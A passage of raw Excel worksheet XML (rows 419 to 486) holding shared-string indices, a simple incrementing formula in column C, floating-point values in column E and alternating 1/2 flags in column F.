        <v>1</v>
      </c>
    </row>
    <row r="419" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A419" t="s">
        <v>812</v>
      </c>
      <c r="B419" t="s">
        <v>813</v>
      </c>
      <c r="C419">
        <f t="shared" si="6"/>
        <v>9953942</v>
      </c>
      <c r="D419" t="s">
        <v>815</v>
      </c>
      <c r="E419">
        <v>14.524421691894529</v>
      </c>
      <c r="F419">
        <v>2</v>
      </c>
    </row>
    <row r="420" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A420" t="s">
        <v>816</v>
      </c>
      <c r="B420" t="s">
        <v>817</v>
      </c>
      <c r="C420">
        <f t="shared" si="6"/>
        <v>9955195</v>
      </c>
      <c r="D420" t="s">
        <v>818</v>
      </c>
      <c r="E420">
        <v>29.947830200195309</v>
      </c>
      <c r="F420">
        <v>1</v>
      </c>
    </row>
    <row r="421" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A421" t="s">
        <v>816</v>
      </c>
      <c r="B421" t="s">
        <v>817</v>
      </c>
      <c r="C421">
        <f t="shared" si="6"/>
        <v>9956448</v>
      </c>
      <c r="D421" t="s">
        <v>819</v>
      </c>
      <c r="E421">
        <v>2.3553671836853032</v>
      </c>
      <c r="F421">
        <v>2</v>
      </c>
    </row>
    <row r="422" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A422" t="s">
        <v>820</v>
      </c>
      <c r="B422" t="s">
        <v>821</v>
      </c>
      <c r="C422">
        <f t="shared" si="6"/>
        <v>9957701</v>
      </c>
      <c r="D422" t="s">
        <v>822</v>
      </c>
      <c r="E422">
        <v>14.28886032104492</v>
      </c>
      <c r="F422">
        <v>1</v>
      </c>
    </row>
    <row r="423" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A423" t="s">
        <v>820</v>
      </c>
      <c r="B423" t="s">
        <v>821</v>
      </c>
      <c r="C423">
        <f t="shared" si="6"/>
        <v>9958954</v>
      </c>
      <c r="D423" t="s">
        <v>823</v>
      </c>
      <c r="E423">
        <v>1.319313764572144</v>
      </c>
      <c r="F423">
        <v>2</v>
      </c>
    </row>
    <row r="424" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A424" t="s">
        <v>824</v>
      </c>
      <c r="B424" t="s">
        <v>825</v>
      </c>
      <c r="C424">
        <f t="shared" si="6"/>
        <v>9960207</v>
      </c>
      <c r="D424" t="s">
        <v>826</v>
      </c>
      <c r="E424">
        <v>27.355094909667969</v>
      </c>
      <c r="F424">
        <v>1</v>
      </c>
    </row>
    <row r="425" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A425" t="s">
        <v>824</v>
      </c>
      <c r="B425" t="s">
        <v>825</v>
      </c>
      <c r="C425">
        <f t="shared" si="6"/>
        <v>9961460</v>
      </c>
      <c r="D425" t="s">
        <v>827</v>
      </c>
      <c r="E425">
        <v>9.5697593688964844</v>
      </c>
      <c r="F425">
        <v>2</v>
      </c>
    </row>
    <row r="426" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A426" t="s">
        <v>828</v>
      </c>
      <c r="B426" t="s">
        <v>829</v>
      </c>
      <c r="C426">
        <f t="shared" si="6"/>
        <v>9962713</v>
      </c>
      <c r="D426" t="s">
        <v>830</v>
      </c>
      <c r="E426">
        <v>28.484430313110352</v>
      </c>
      <c r="F426">
        <v>1</v>
      </c>
    </row>
    <row r="427" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A427" t="s">
        <v>828</v>
      </c>
      <c r="B427" t="s">
        <v>829</v>
      </c>
      <c r="C427">
        <f t="shared" si="6"/>
        <v>9963966</v>
      </c>
      <c r="D427" t="s">
        <v>831</v>
      </c>
      <c r="E427">
        <v>1.8838438987731929</v>
      </c>
      <c r="F427">
        <v>2</v>
      </c>
    </row>
    <row r="428" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A428" t="s">
        <v>832</v>
      </c>
      <c r="B428" t="s">
        <v>833</v>
      </c>
      <c r="C428">
        <f t="shared" si="6"/>
        <v>9965219</v>
      </c>
      <c r="D428" t="s">
        <v>834</v>
      </c>
      <c r="E428">
        <v>23.882013320922852</v>
      </c>
      <c r="F428">
        <v>1</v>
      </c>
    </row>
    <row r="429" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A429" t="s">
        <v>832</v>
      </c>
      <c r="B429" t="s">
        <v>833</v>
      </c>
      <c r="C429">
        <f t="shared" si="6"/>
        <v>9966472</v>
      </c>
      <c r="D429" t="s">
        <v>835</v>
      </c>
      <c r="E429">
        <v>2.428236722946167</v>
      </c>
      <c r="F429">
        <v>2</v>
      </c>
    </row>
    <row r="430" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A430" t="s">
        <v>836</v>
      </c>
      <c r="B430" t="s">
        <v>837</v>
      </c>
      <c r="C430">
        <f t="shared" si="6"/>
        <v>9967725</v>
      </c>
      <c r="D430" t="s">
        <v>838</v>
      </c>
      <c r="E430">
        <v>22.227996826171879</v>
      </c>
      <c r="F430">
        <v>1</v>
      </c>
    </row>
    <row r="431" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A431" t="s">
        <v>836</v>
      </c>
      <c r="B431" t="s">
        <v>837</v>
      </c>
      <c r="C431">
        <f t="shared" si="6"/>
        <v>9968978</v>
      </c>
      <c r="D431" t="s">
        <v>839</v>
      </c>
      <c r="E431">
        <v>4.5314693124964828E-4</v>
      </c>
      <c r="F431">
        <v>2</v>
      </c>
    </row>
    <row r="432" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A432" t="s">
        <v>840</v>
      </c>
      <c r="B432" t="s">
        <v>325</v>
      </c>
      <c r="C432">
        <f t="shared" si="6"/>
        <v>9970231</v>
      </c>
      <c r="D432" t="s">
        <v>841</v>
      </c>
      <c r="E432">
        <v>21.063327789306641</v>
      </c>
      <c r="F432">
        <v>1</v>
      </c>
    </row>
    <row r="433" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A433" t="s">
        <v>840</v>
      </c>
      <c r="B433" t="s">
        <v>325</v>
      </c>
      <c r="C433">
        <f t="shared" si="6"/>
        <v>9971484</v>
      </c>
      <c r="D433" t="s">
        <v>842</v>
      </c>
      <c r="E433">
        <v>1.1330406665802</v>
      </c>
      <c r="F433">
        <v>2</v>
      </c>
    </row>
    <row r="434" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A434" t="s">
        <v>843</v>
      </c>
      <c r="B434" t="s">
        <v>844</v>
      </c>
      <c r="C434">
        <f t="shared" si="6"/>
        <v>9972737</v>
      </c>
      <c r="D434" t="s">
        <v>845</v>
      </c>
      <c r="E434">
        <v>30.166879653930661</v>
      </c>
      <c r="F434">
        <v>1</v>
      </c>
    </row>
    <row r="435" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A435" t="s">
        <v>843</v>
      </c>
      <c r="B435" t="s">
        <v>844</v>
      </c>
      <c r="C435">
        <f t="shared" si="6"/>
        <v>9973990</v>
      </c>
      <c r="D435" t="s">
        <v>846</v>
      </c>
      <c r="E435">
        <v>13.503514289855961</v>
      </c>
      <c r="F435">
        <v>2</v>
      </c>
    </row>
    <row r="436" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A436" t="s">
        <v>847</v>
      </c>
      <c r="B436" t="s">
        <v>848</v>
      </c>
      <c r="C436">
        <f t="shared" si="6"/>
        <v>9975243</v>
      </c>
      <c r="D436" t="s">
        <v>849</v>
      </c>
      <c r="E436">
        <v>35.18841552734375</v>
      </c>
      <c r="F436">
        <v>1</v>
      </c>
    </row>
    <row r="437" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A437" t="s">
        <v>847</v>
      </c>
      <c r="B437" t="s">
        <v>848</v>
      </c>
      <c r="C437">
        <f t="shared" si="6"/>
        <v>9976496</v>
      </c>
      <c r="D437" t="s">
        <v>850</v>
      </c>
      <c r="E437">
        <v>3.4639837741851811</v>
      </c>
      <c r="F437">
        <v>2</v>
      </c>
    </row>
    <row r="438" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A438" t="s">
        <v>851</v>
      </c>
      <c r="B438" t="s">
        <v>852</v>
      </c>
      <c r="C438">
        <f t="shared" si="6"/>
        <v>9977749</v>
      </c>
      <c r="D438" t="s">
        <v>853</v>
      </c>
      <c r="E438">
        <v>38.019962310791023</v>
      </c>
      <c r="F438">
        <v>1</v>
      </c>
    </row>
    <row r="439" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A439" t="s">
        <v>851</v>
      </c>
      <c r="B439" t="s">
        <v>852</v>
      </c>
      <c r="C439">
        <f t="shared" si="6"/>
        <v>9979002</v>
      </c>
      <c r="D439" t="s">
        <v>854</v>
      </c>
      <c r="E439">
        <v>4.793004035949707</v>
      </c>
      <c r="F439">
        <v>2</v>
      </c>
    </row>
    <row r="440" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A440" t="s">
        <v>855</v>
      </c>
      <c r="B440" t="s">
        <v>856</v>
      </c>
      <c r="C440">
        <f t="shared" si="6"/>
        <v>9980255</v>
      </c>
      <c r="D440" t="s">
        <v>857</v>
      </c>
      <c r="E440">
        <v>21.09005165100098</v>
      </c>
      <c r="F440">
        <v>1</v>
      </c>
    </row>
    <row r="441" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A441" t="s">
        <v>855</v>
      </c>
      <c r="B441" t="s">
        <v>856</v>
      </c>
      <c r="C441">
        <f t="shared" si="6"/>
        <v>9981508</v>
      </c>
      <c r="D441" t="s">
        <v>858</v>
      </c>
      <c r="E441">
        <v>3.3204712867736821</v>
      </c>
      <c r="F441">
        <v>2</v>
      </c>
    </row>
    <row r="442" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A442" t="s">
        <v>859</v>
      </c>
      <c r="B442" t="s">
        <v>860</v>
      </c>
      <c r="C442">
        <f t="shared" si="6"/>
        <v>9982761</v>
      </c>
      <c r="D442" t="s">
        <v>861</v>
      </c>
      <c r="E442">
        <v>13.98514938354492</v>
      </c>
      <c r="F442">
        <v>1</v>
      </c>
    </row>
    <row r="443" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A443" t="s">
        <v>859</v>
      </c>
      <c r="B443" t="s">
        <v>860</v>
      </c>
      <c r="C443">
        <f t="shared" si="6"/>
        <v>9984014</v>
      </c>
      <c r="D443" t="s">
        <v>862</v>
      </c>
      <c r="E443">
        <v>9.5979032516479492</v>
      </c>
      <c r="F443">
        <v>2</v>
      </c>
    </row>
    <row r="444" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A444" t="s">
        <v>863</v>
      </c>
      <c r="B444" t="s">
        <v>864</v>
      </c>
      <c r="C444">
        <f t="shared" si="6"/>
        <v>9985267</v>
      </c>
      <c r="D444" t="s">
        <v>865</v>
      </c>
      <c r="E444">
        <v>22.416677474975589</v>
      </c>
      <c r="F444">
        <v>1</v>
      </c>
    </row>
    <row r="445" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A445" t="s">
        <v>863</v>
      </c>
      <c r="B445" t="s">
        <v>864</v>
      </c>
      <c r="C445">
        <f t="shared" si="6"/>
        <v>9986520</v>
      </c>
      <c r="D445" t="s">
        <v>866</v>
      </c>
      <c r="E445">
        <v>11.194803237915041</v>
      </c>
      <c r="F445">
        <v>2</v>
      </c>
    </row>
    <row r="446" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A446" t="s">
        <v>867</v>
      </c>
      <c r="B446" t="s">
        <v>868</v>
      </c>
      <c r="C446">
        <f t="shared" si="6"/>
        <v>9987773</v>
      </c>
      <c r="D446" t="s">
        <v>869</v>
      </c>
      <c r="E446">
        <v>31.42594146728516</v>
      </c>
      <c r="F446">
        <v>1</v>
      </c>
    </row>
    <row r="447" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A447" t="s">
        <v>867</v>
      </c>
      <c r="B447" t="s">
        <v>868</v>
      </c>
      <c r="C447">
        <f t="shared" si="6"/>
        <v>9989026</v>
      </c>
      <c r="D447" t="s">
        <v>870</v>
      </c>
      <c r="E447">
        <v>6.1583328247070313</v>
      </c>
      <c r="F447">
        <v>2</v>
      </c>
    </row>
    <row r="448" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A448" t="s">
        <v>871</v>
      </c>
      <c r="B448" t="s">
        <v>872</v>
      </c>
      <c r="C448">
        <f t="shared" si="6"/>
        <v>9990279</v>
      </c>
      <c r="D448" t="s">
        <v>873</v>
      </c>
      <c r="E448">
        <v>23.10828971862793</v>
      </c>
      <c r="F448">
        <v>1</v>
      </c>
    </row>
    <row r="449" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A449" t="s">
        <v>871</v>
      </c>
      <c r="B449" t="s">
        <v>872</v>
      </c>
      <c r="C449">
        <f t="shared" si="6"/>
        <v>9991532</v>
      </c>
      <c r="D449" t="s">
        <v>874</v>
      </c>
      <c r="E449">
        <v>4.0313200950622559</v>
      </c>
      <c r="F449">
        <v>2</v>
      </c>
    </row>
    <row r="450" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A450" t="s">
        <v>875</v>
      </c>
      <c r="B450" t="s">
        <v>876</v>
      </c>
      <c r="C450">
        <f t="shared" si="6"/>
        <v>9992785</v>
      </c>
      <c r="D450" t="s">
        <v>877</v>
      </c>
      <c r="E450">
        <v>16.404153823852539</v>
      </c>
      <c r="F450">
        <v>1</v>
      </c>
    </row>
    <row r="451" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A451" t="s">
        <v>875</v>
      </c>
      <c r="B451" t="s">
        <v>876</v>
      </c>
      <c r="C451">
        <f t="shared" si="6"/>
        <v>9994038</v>
      </c>
      <c r="D451" t="s">
        <v>878</v>
      </c>
      <c r="E451">
        <v>1.6047201156616211</v>
      </c>
      <c r="F451">
        <v>2</v>
      </c>
    </row>
    <row r="452" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A452" t="s">
        <v>879</v>
      </c>
      <c r="B452" t="s">
        <v>880</v>
      </c>
      <c r="C452">
        <f t="shared" si="6"/>
        <v>9995291</v>
      </c>
      <c r="D452" t="s">
        <v>881</v>
      </c>
      <c r="E452">
        <v>26.568449020385739</v>
      </c>
      <c r="F452">
        <v>1</v>
      </c>
    </row>
    <row r="453" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A453" t="s">
        <v>879</v>
      </c>
      <c r="B453" t="s">
        <v>880</v>
      </c>
      <c r="C453">
        <f t="shared" si="6"/>
        <v>9996544</v>
      </c>
      <c r="D453" t="s">
        <v>882</v>
      </c>
      <c r="E453">
        <v>8.2674112319946289</v>
      </c>
      <c r="F453">
        <v>2</v>
      </c>
    </row>
    <row r="454" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A454" t="s">
        <v>883</v>
      </c>
      <c r="B454" t="s">
        <v>884</v>
      </c>
      <c r="C454">
        <f t="shared" si="6"/>
        <v>9997797</v>
      </c>
      <c r="D454" t="s">
        <v>885</v>
      </c>
      <c r="E454">
        <v>25.953947067260739</v>
      </c>
      <c r="F454">
        <v>1</v>
      </c>
    </row>
    <row r="455" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A455" t="s">
        <v>883</v>
      </c>
      <c r="B455" t="s">
        <v>884</v>
      </c>
      <c r="C455">
        <f t="shared" si="6"/>
        <v>9999050</v>
      </c>
      <c r="D455" t="s">
        <v>886</v>
      </c>
      <c r="E455">
        <v>10.043143272399901</v>
      </c>
      <c r="F455">
        <v>2</v>
      </c>
    </row>
    <row r="456" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A456" t="s">
        <v>887</v>
      </c>
      <c r="B456" t="s">
        <v>888</v>
      </c>
      <c r="C456">
        <f t="shared" si="6"/>
        <v>10000303</v>
      </c>
      <c r="D456" t="s">
        <v>889</v>
      </c>
      <c r="E456">
        <v>26.117900848388668</v>
      </c>
      <c r="F456">
        <v>1</v>
      </c>
    </row>
    <row r="457" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A457" t="s">
        <v>887</v>
      </c>
      <c r="B457" t="s">
        <v>888</v>
      </c>
      <c r="C457">
        <f t="shared" si="6"/>
        <v>10001556</v>
      </c>
      <c r="D457" t="s">
        <v>890</v>
      </c>
      <c r="E457">
        <v>1.8937174172606319E-4</v>
      </c>
      <c r="F457">
        <v>2</v>
      </c>
    </row>
    <row r="458" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A458" t="s">
        <v>891</v>
      </c>
      <c r="B458" t="s">
        <v>892</v>
      </c>
      <c r="C458">
        <f t="shared" ref="C458:C521" si="7">C457+1253</f>
        <v>10002809</v>
      </c>
      <c r="D458" t="s">
        <v>893</v>
      </c>
      <c r="E458">
        <v>24.96092414855957</v>
      </c>
      <c r="F458">
        <v>1</v>
      </c>
    </row>
    <row r="459" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A459" t="s">
        <v>891</v>
      </c>
      <c r="B459" t="s">
        <v>892</v>
      </c>
      <c r="C459">
        <f t="shared" si="7"/>
        <v>10004062</v>
      </c>
      <c r="D459" t="s">
        <v>894</v>
      </c>
      <c r="E459">
        <v>5.029179573059082</v>
      </c>
      <c r="F459">
        <v>2</v>
      </c>
    </row>
    <row r="460" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A460" t="s">
        <v>895</v>
      </c>
      <c r="B460" t="s">
        <v>896</v>
      </c>
      <c r="C460">
        <f t="shared" si="7"/>
        <v>10005315</v>
      </c>
      <c r="D460" t="s">
        <v>158</v>
      </c>
      <c r="E460">
        <v>29.712249755859379</v>
      </c>
      <c r="F460">
        <v>1</v>
      </c>
    </row>
    <row r="461" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A461" t="s">
        <v>895</v>
      </c>
      <c r="B461" t="s">
        <v>896</v>
      </c>
      <c r="C461">
        <f t="shared" si="7"/>
        <v>10006568</v>
      </c>
      <c r="D461" t="s">
        <v>897</v>
      </c>
      <c r="E461">
        <v>7.2995266914367676</v>
      </c>
      <c r="F461">
        <v>2</v>
      </c>
    </row>
    <row r="462" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A462" t="s">
        <v>898</v>
      </c>
      <c r="B462" t="s">
        <v>899</v>
      </c>
      <c r="C462">
        <f t="shared" si="7"/>
        <v>10007821</v>
      </c>
      <c r="D462" t="s">
        <v>900</v>
      </c>
      <c r="E462">
        <v>21.78363037109375</v>
      </c>
      <c r="F462">
        <v>1</v>
      </c>
    </row>
    <row r="463" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A463" t="s">
        <v>898</v>
      </c>
      <c r="B463" t="s">
        <v>899</v>
      </c>
      <c r="C463">
        <f t="shared" si="7"/>
        <v>10009074</v>
      </c>
      <c r="D463" t="s">
        <v>901</v>
      </c>
      <c r="E463">
        <v>2.9886627197265621</v>
      </c>
      <c r="F463">
        <v>2</v>
      </c>
    </row>
    <row r="464" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A464" t="s">
        <v>902</v>
      </c>
      <c r="B464" t="s">
        <v>903</v>
      </c>
      <c r="C464">
        <f t="shared" si="7"/>
        <v>10010327</v>
      </c>
      <c r="D464" t="s">
        <v>904</v>
      </c>
      <c r="E464">
        <v>21.35074424743652</v>
      </c>
      <c r="F464">
        <v>1</v>
      </c>
    </row>
    <row r="465" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A465" t="s">
        <v>902</v>
      </c>
      <c r="B465" t="s">
        <v>903</v>
      </c>
      <c r="C465">
        <f t="shared" si="7"/>
        <v>10011580</v>
      </c>
      <c r="D465" t="s">
        <v>905</v>
      </c>
      <c r="E465">
        <v>10.492902755737299</v>
      </c>
      <c r="F465">
        <v>2</v>
      </c>
    </row>
    <row r="466" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A466" t="s">
        <v>906</v>
      </c>
      <c r="B466" t="s">
        <v>907</v>
      </c>
      <c r="C466">
        <f t="shared" si="7"/>
        <v>10012833</v>
      </c>
      <c r="D466" t="s">
        <v>908</v>
      </c>
      <c r="E466">
        <v>29.19002723693848</v>
      </c>
      <c r="F466">
        <v>1</v>
      </c>
    </row>
    <row r="467" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A467" t="s">
        <v>906</v>
      </c>
      <c r="B467" t="s">
        <v>907</v>
      </c>
      <c r="C467">
        <f t="shared" si="7"/>
        <v>10014086</v>
      </c>
      <c r="D467" t="s">
        <v>909</v>
      </c>
      <c r="E467">
        <v>8.2305965423583984</v>
      </c>
      <c r="F467">
        <v>2</v>
      </c>
    </row>
    <row r="468" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A468" t="s">
        <v>910</v>
      </c>
      <c r="B468" t="s">
        <v>911</v>
      </c>
      <c r="C468">
        <f t="shared" si="7"/>
        <v>10015339</v>
      </c>
      <c r="D468" t="s">
        <v>912</v>
      </c>
      <c r="E468">
        <v>24.164735794067379</v>
      </c>
      <c r="F468">
        <v>1</v>
      </c>
    </row>
    <row r="469" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A469" t="s">
        <v>910</v>
      </c>
      <c r="B469" t="s">
        <v>911</v>
      </c>
      <c r="C469">
        <f t="shared" si="7"/>
        <v>10016592</v>
      </c>
      <c r="D469" t="s">
        <v>913</v>
      </c>
      <c r="E469">
        <v>2.9690017700195308</v>
      </c>
      <c r="F469">
        <v>2</v>
      </c>
    </row>
    <row r="470" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A470" t="s">
        <v>914</v>
      </c>
      <c r="B470" t="s">
        <v>915</v>
      </c>
      <c r="C470">
        <f t="shared" si="7"/>
        <v>10017845</v>
      </c>
      <c r="D470" t="s">
        <v>916</v>
      </c>
      <c r="E470">
        <v>24.349470138549801</v>
      </c>
      <c r="F470">
        <v>1</v>
      </c>
    </row>
    <row r="471" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A471" t="s">
        <v>914</v>
      </c>
      <c r="B471" t="s">
        <v>915</v>
      </c>
      <c r="C471">
        <f t="shared" si="7"/>
        <v>10019098</v>
      </c>
      <c r="D471" t="s">
        <v>917</v>
      </c>
      <c r="E471">
        <v>7.4872472323477268E-3</v>
      </c>
      <c r="F471">
        <v>2</v>
      </c>
    </row>
    <row r="472" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A472" t="s">
        <v>918</v>
      </c>
      <c r="B472" t="s">
        <v>919</v>
      </c>
      <c r="C472">
        <f t="shared" si="7"/>
        <v>10020351</v>
      </c>
      <c r="D472" t="s">
        <v>920</v>
      </c>
      <c r="E472">
        <v>26.725637435913089</v>
      </c>
      <c r="F472">
        <v>1</v>
      </c>
    </row>
    <row r="473" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A473" t="s">
        <v>918</v>
      </c>
      <c r="B473" t="s">
        <v>919</v>
      </c>
      <c r="C473">
        <f t="shared" si="7"/>
        <v>10021604</v>
      </c>
      <c r="D473" t="s">
        <v>921</v>
      </c>
      <c r="E473">
        <v>14.356838226318359</v>
      </c>
      <c r="F473">
        <v>2</v>
      </c>
    </row>
    <row r="474" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A474" t="s">
        <v>922</v>
      </c>
      <c r="B474" t="s">
        <v>923</v>
      </c>
      <c r="C474">
        <f t="shared" si="7"/>
        <v>10022857</v>
      </c>
      <c r="D474" t="s">
        <v>924</v>
      </c>
      <c r="E474">
        <v>36.209102630615227</v>
      </c>
      <c r="F474">
        <v>1</v>
      </c>
    </row>
    <row r="475" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A475" t="s">
        <v>922</v>
      </c>
      <c r="B475" t="s">
        <v>923</v>
      </c>
      <c r="C475">
        <f t="shared" si="7"/>
        <v>10024110</v>
      </c>
      <c r="D475" t="s">
        <v>925</v>
      </c>
      <c r="E475">
        <v>7.6935097575187683E-2</v>
      </c>
      <c r="F475">
        <v>2</v>
      </c>
    </row>
    <row r="476" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A476" t="s">
        <v>926</v>
      </c>
      <c r="B476" t="s">
        <v>927</v>
      </c>
      <c r="C476">
        <f t="shared" si="7"/>
        <v>10025363</v>
      </c>
      <c r="D476" t="s">
        <v>282</v>
      </c>
      <c r="E476">
        <v>24.202638626098629</v>
      </c>
      <c r="F476">
        <v>1</v>
      </c>
    </row>
    <row r="477" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A477" t="s">
        <v>926</v>
      </c>
      <c r="B477" t="s">
        <v>927</v>
      </c>
      <c r="C477">
        <f t="shared" si="7"/>
        <v>10026616</v>
      </c>
      <c r="D477" t="s">
        <v>928</v>
      </c>
      <c r="E477">
        <v>3.628475666046143</v>
      </c>
      <c r="F477">
        <v>2</v>
      </c>
    </row>
    <row r="478" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A478" t="s">
        <v>929</v>
      </c>
      <c r="B478" t="s">
        <v>930</v>
      </c>
      <c r="C478">
        <f t="shared" si="7"/>
        <v>10027869</v>
      </c>
      <c r="D478" t="s">
        <v>931</v>
      </c>
      <c r="E478">
        <v>24.251771926879879</v>
      </c>
      <c r="F478">
        <v>1</v>
      </c>
    </row>
    <row r="479" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A479" t="s">
        <v>929</v>
      </c>
      <c r="B479" t="s">
        <v>930</v>
      </c>
      <c r="C479">
        <f t="shared" si="7"/>
        <v>10029122</v>
      </c>
      <c r="D479" t="s">
        <v>932</v>
      </c>
      <c r="E479">
        <v>15.37940120697021</v>
      </c>
      <c r="F479">
        <v>2</v>
      </c>
    </row>
    <row r="480" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A480" t="s">
        <v>933</v>
      </c>
      <c r="B480" t="s">
        <v>817</v>
      </c>
      <c r="C480">
        <f t="shared" si="7"/>
        <v>10030375</v>
      </c>
      <c r="D480" t="s">
        <v>934</v>
      </c>
      <c r="E480">
        <v>28.92240142822266</v>
      </c>
      <c r="F480">
        <v>1</v>
      </c>
    </row>
    <row r="481" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A481" t="s">
        <v>933</v>
      </c>
      <c r="B481" t="s">
        <v>817</v>
      </c>
      <c r="C481">
        <f t="shared" si="7"/>
        <v>10031628</v>
      </c>
      <c r="D481" t="s">
        <v>935</v>
      </c>
      <c r="E481">
        <v>4.7740726470947266</v>
      </c>
      <c r="F481">
        <v>2</v>
      </c>
    </row>
    <row r="482" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A482" t="s">
        <v>936</v>
      </c>
      <c r="B482" t="s">
        <v>937</v>
      </c>
      <c r="C482">
        <f t="shared" si="7"/>
        <v>10032881</v>
      </c>
      <c r="D482" t="s">
        <v>938</v>
      </c>
      <c r="E482">
        <v>24.768478393554691</v>
      </c>
      <c r="F482">
        <v>1</v>
      </c>
    </row>
    <row r="483" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A483" t="s">
        <v>936</v>
      </c>
      <c r="B483" t="s">
        <v>937</v>
      </c>
      <c r="C483">
        <f t="shared" si="7"/>
        <v>10034134</v>
      </c>
      <c r="D483" t="s">
        <v>939</v>
      </c>
      <c r="E483">
        <v>10.39601993560791</v>
      </c>
      <c r="F483">
        <v>2</v>
      </c>
    </row>
    <row r="484" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A484" t="s">
        <v>940</v>
      </c>
      <c r="B484" t="s">
        <v>941</v>
      </c>
      <c r="C484">
        <f t="shared" si="7"/>
        <v>10035387</v>
      </c>
      <c r="D484" t="s">
        <v>942</v>
      </c>
      <c r="E484">
        <v>23.782224655151371</v>
      </c>
      <c r="F484">
        <v>1</v>
      </c>
    </row>
    <row r="485" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A485" t="s">
        <v>940</v>
      </c>
      <c r="B485" t="s">
        <v>941</v>
      </c>
      <c r="C485">
        <f t="shared" si="7"/>
        <v>10036640</v>
      </c>
      <c r="D485" t="s">
        <v>943</v>
      </c>
      <c r="E485">
        <v>9.6466922760009766</v>
      </c>
      <c r="F485">
        <v>2</v>
      </c>
    </row>
    <row r="486" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A486" t="s">
        <v>944</v>
      </c>
      <c r="B486" t="s">
        <v>945</v>
      </c>
      <c r="C486">
        <f t="shared" si="7"/>
        <v>10037893</v>
      </c>
      <c r="D486" t="s">
        <v>946</v>
      </c>
      <c r="E486">
        <v>13.396013259887701</v>
      </c>
